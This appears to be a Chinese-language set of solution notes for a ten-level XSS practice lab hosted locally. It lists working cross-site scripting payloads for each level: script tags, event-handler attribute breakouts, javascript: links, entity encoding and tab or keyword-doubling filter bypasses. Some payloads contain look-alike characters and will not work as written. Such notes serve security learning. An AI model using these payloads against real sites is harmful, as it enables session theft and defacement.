依然是自己地服务器http://127.0.0.1/xss
答案:
1.result: payload框加上 <script>alert(1)</script>
2.result: payload框加上 ?keyword=%09+"+onclick%3Dalert(1)>+需要点击一下输入框。<br>
?keyword=%09+" οnmοuseοver="alert(/s/)"+>+
3.result: 输入框输入 ' ' οnmοuseοver=alert(1)//
(onclick点击 onmouseover 滑过)onerror如果有图片出一个弹窗
几种方式:
不逃逸input的payload " οnmοuseοver="alert(/s/) 鼠标滑过 " οnmοuseοver="alert(/s/)
"οnclick="alert(/xss/) 鼠标点击
逃逸input的payload:"><img src ! οnerrοr= "alert(/xss/) 如果图片指向非空则执行弹窗操作
"><a href="javascript:alert(/s/)">xss</a> 构建超链接引发弹窗
第一题
<script>alert(1)</script>
第二题
?keyword=%09+"onclick%3D+alert(1)>+需要点击一下输入框。<br>
"><script>alert(1);</script>(形成闭合就行)
第三题
' οnclick=alert(1)//
第四题
" οnclick=alert(1)//
第五题
"><a href="javascript:alert(1)">xss</a>
第六题
" " οnfοcus=alert(1) autofocus=" "
第七题
1" oonnclick=alert(1)//
第八题
首先尝试了javascript:alert(1)
用实体编码
javascript:alert(1)(十进制)
第九题
javascr%09ipt:alert(1)//http://
或
javascript:alert(1)//http://
第十题
<input name="keyword" value="test&t_sort="type="text" onclick = "alert(1)" type="hidden">
<input name="t_history" value="'.'"type="hidden">
<input name="t_sort" value=""type="text"οnclick="alert(1)"type=hidden>